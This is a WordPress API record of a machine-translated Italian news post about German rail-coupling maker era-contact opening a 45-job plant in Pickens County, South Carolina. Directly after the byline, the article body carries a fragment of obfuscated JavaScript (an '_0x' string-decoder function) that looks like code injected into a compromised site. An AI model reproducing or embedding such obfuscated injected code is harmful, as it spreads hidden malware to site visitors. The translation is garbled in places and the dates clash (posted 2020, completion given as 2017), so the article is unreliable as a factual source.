{"id":8775,"date":"2020-10-28T16:31:37","date_gmt":"2020-10-28T16:31:37","guid":{"rendered":"http:\/\/alliancepickens.com\/2020\/10\/28\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\/"},"modified":"2021-07-21T22:02:50","modified_gmt":"2021-07-21T22:02:50","slug":"lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta","status":"publish","type":"post","link":"https:\/\/alliancepickens.com\/it\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\/","title":{"rendered":"L&#8217;azienda tedesca annuncia lo stabilimento, posti di lavoro in libert\u00e0"},"content":{"rendered":"<p>Project Big Apple si \u00e8 concretizzata mercoled\u00ec, con l&#8217;annuncio che il leader mondiale negli accoppiamenti ferroviari ad alta velocit\u00e0 sta spostando la sua sede di produzione in Nord America nella contea di Pickens.<br \/>\nIl Consiglio della contea ha dato l&#8217;approvazione finale a un accordo fiscale e ad altri incentivi in una riunione speciale presso la sede centrale di Alliance Pickens per far posto all&#8217;annuncio che il contatto dell&#8217;era con sede in Germania avrebbe costruito una struttura da 3,6 milioni di dollari nel Pickens County Commerce Park che creer\u00e0 45 posti di lavoro.<br \/>\nLa societ\u00e0 era stata indicata come Project Big Apple nei documenti della contea per proteggere la sua identit\u00e0 durante i negoziati perch\u00e9 sar\u00e0 spostando la sua unica operazione negli Stati Uniti da New York a Pickens County.<br \/>\n&#8220;Questo leader mondiale avrebbe potuto andare ovunque, ma hanno scelto la contea di Pickens&#8221;, ha detto la presidente del consiglio Jennifer Willis.<br \/>\nRendering dell&#8217;artista di una struttura da costruire per tempo di contatto nel Pickens County Commerce Park<br \/>\n(Foto: Ron Barnett)<\/p>\n<p>Jochen Kurz, direttore generale dell&#8217;azienda a conduzione familiare, ha detto che il Centro carriera e tecnologico del distretto scolastico della contea di Pickens \u00e8 stato uno dei punti di forza della decisione di localizzarsi nel parco vicino a Liberty.<br \/>\n&#8220;\u00c8 stato amore a prima vista&#8221;, ha detto della sua visita nella contea mentre cercava un sito.<br \/>\nL&#8217;azienda avr\u00e0 bisogno di venditori, ingegneri e tecnici, e si aspetta di essere reclutamento studenti a destra fuori del centro di carriera e la formazione per posti di lavoro, ha detto.<br \/>\nL&#8217;impianto di 38.000 piedi quadrati dovrebbe essere completato nel primo trimestre del 2017, ha detto.<br \/>\nIl mercato dell&#8217;azienda negli Stati Uniti \u00e8 simile per dimensioni alla sua attivit\u00e0 in Cina, dove dipendenti circa 200 lavoratori, e Kurz ha detto a The Greenville News che si aspetta di avere una grande forza lavoro qui alla fine.<br \/>\n&#8220;\u00c8 sempre un grande giorno nel nostro stato in cui possiamo accogliere un&#8217;azienda come l&#8217;era-contact USA alla famiglia della Carolina del Sud&#8221;, ha detto nikki Haley in una dichiarazione rilasciata dal Dipartimento del Commercio. &#8220;La loro decisione di creare 45 nuovi posti di lavoro nella contea di Pickens \u00e8 una grande vittoria per la gente della Carolina del Sud ed \u00e8 un vero motivo per festeggiare in tutto lo stato.&#8221;<br \/>\nRon Barnett, rbarnett@greenvillenews.com<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Project Big Apple si \u00e8 concretizzata mercoled\u00ec, con l&#8217;annuncio che il leader mondiale negli accoppiamenti ferroviari ad alta velocit\u00e0 sta spostando la sua sede di produzione in Nord America nella contea di Pickens. Il Consiglio della contea ha dato l&#8217;approvazione finale a un accordo fiscale e ad altri incentivi in una riunione speciale presso la&hellip;<\/p>\n","protected":false},"author":8,"featured_media":5271,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[54],"tags":[],"class_list":["post-8775","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news-it","category-54","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>L&#039;azienda tedesca annuncia lo stabilimento, posti di lavoro in libert\u00e0 - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/it\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"L&#039;azienda tedesca annuncia lo stabilimento, posti di lavoro in libert\u00e0 - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"Project Big Apple si \u00e8 concretizzata mercoled\u00ec, con l&#8217;annuncio che il leader mondiale negli accoppiamenti ferroviari ad alta velocit\u00e0 sta spostando la sua sede di produzione in Nord America nella contea di Pickens. Il Consiglio della contea ha dato l&#8217;approvazione finale a un accordo fiscale e ad altri incentivi in una riunione speciale presso la&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/it\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:published_time\" content=\"2020-10-28T16:31:37+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-07-21T22:02:50+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/eraContactlogo98x80.png\" \/>\n\t<meta property=\"og:image:width\" content=\"98\" \/>\n\t<meta property=\"og:image:height\" content=\"80\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"AP Transfer\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"AP Transfer\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\\\/\"},\"author\":{\"name\":\"AP Transfer\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\"},\"headline\":\"L&#8217;azienda tedesca annuncia lo stabilimento, posti di lavoro in libert\u00e0\",\"datePublished\":\"2020-10-28T16:31:37+00:00\",\"dateModified\":\"2021-07-21T22:02:50+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\\\/\"},\"wordCount\":434,\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/10\\\/eraContactlogo98x80.png\",\"articleSection\":[\"News\"],\"inLanguage\":\"it-IT\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\\\/\",\"name\":\"L'azienda tedesca annuncia lo stabilimento, posti di lavoro in libert\u00e0 - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/10\\\/eraContactlogo98x80.png\",\"datePublished\":\"2020-10-28T16:31:37+00:00\",\"dateModified\":\"2021-07-21T22:02:50+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\\\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/it\\\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\\\/#primaryimage\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/10\\\/eraContactlogo98x80.png\",\"contentUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/10\\\/eraContactlogo98x80.png\",\"width\":98,\"height\":80,\"caption\":\"ERA Contact Logo (Small)\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"L&#8217;azienda tedesca annuncia lo stabilimento, posti di lavoro in libert\u00e0\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\",\"name\":\"AP Transfer\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"caption\":\"AP Transfer\"},\"url\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/author\\\/aptransfer\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"L'azienda tedesca annuncia lo stabilimento, posti di lavoro in libert\u00e0 - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/it\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\/","og_locale":"it_IT","og_type":"article","og_title":"L'azienda tedesca annuncia lo stabilimento, posti di lavoro in libert\u00e0 - Alliance Pickens","og_description":"Project Big Apple si \u00e8 concretizzata mercoled\u00ec, con l&#8217;annuncio che il leader mondiale negli accoppiamenti ferroviari ad alta velocit\u00e0 sta spostando la sua sede di produzione in Nord America nella contea di Pickens. Il Consiglio della contea ha dato l&#8217;approvazione finale a un accordo fiscale e ad altri incentivi in una riunione speciale presso la&hellip;","og_url":"https:\/\/alliancepickens.com\/it\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\/","og_site_name":"Alliance Pickens","article_published_time":"2020-10-28T16:31:37+00:00","article_modified_time":"2021-07-21T22:02:50+00:00","og_image":[{"width":98,"height":80,"url":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/eraContactlogo98x80.png","type":"image\/png"}],"author":"AP Transfer","twitter_card":"summary_large_image","twitter_misc":{"Written by":"AP Transfer","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/alliancepickens.com\/it\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\/#article","isPartOf":{"@id":"https:\/\/alliancepickens.com\/it\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\/"},"author":{"name":"AP Transfer","@id":"https:\/\/alliancepickens.com\/it\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01"},"headline":"L&#8217;azienda tedesca annuncia lo stabilimento, posti di lavoro in libert\u00e0","datePublished":"2020-10-28T16:31:37+00:00","dateModified":"2021-07-21T22:02:50+00:00","mainEntityOfPage":{"@id":"https:\/\/alliancepickens.com\/it\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\/"},"wordCount":434,"image":{"@id":"https:\/\/alliancepickens.com\/it\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\/#primaryimage"},"thumbnailUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/eraContactlogo98x80.png","articleSection":["News"],"inLanguage":"it-IT"},{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/it\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\/","url":"https:\/\/alliancepickens.com\/it\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\/","name":"L'azienda tedesca annuncia lo stabilimento, posti di lavoro in libert\u00e0 - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/it\/#website"},"primaryImageOfPage":{"@id":"https:\/\/alliancepickens.com\/it\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\/#primaryimage"},"image":{"@id":"https:\/\/alliancepickens.com\/it\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\/#primaryimage"},"thumbnailUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/eraContactlogo98x80.png","datePublished":"2020-10-28T16:31:37+00:00","dateModified":"2021-07-21T22:02:50+00:00","author":{"@id":"https:\/\/alliancepickens.com\/it\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01"},"breadcrumb":{"@id":"https:\/\/alliancepickens.com\/it\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/it\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\/"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/alliancepickens.com\/it\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\/#primaryimage","url":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/eraContactlogo98x80.png","contentUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/eraContactlogo98x80.png","width":98,"height":80,"caption":"ERA Contact Logo (Small)"},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/it\/lazienda-tedesca-annuncia-lo-stabilimento-posti-di-lavoro-in-liberta\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/it\/"},{"@type":"ListItem","position":2,"name":"L&#8217;azienda tedesca annuncia lo stabilimento, posti di lavoro in libert\u00e0"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/it\/#website","url":"https:\/\/alliancepickens.com\/it\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Person","@id":"https:\/\/alliancepickens.com\/it\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01","name":"AP Transfer","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","caption":"AP Transfer"},"url":"https:\/\/alliancepickens.com\/it\/author\/aptransfer\/"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/posts\/8775","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/comments?post=8775"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/posts\/8775\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/media\/5271"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/media?parent=8775"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/categories?post=8775"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/tags?post=8775"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}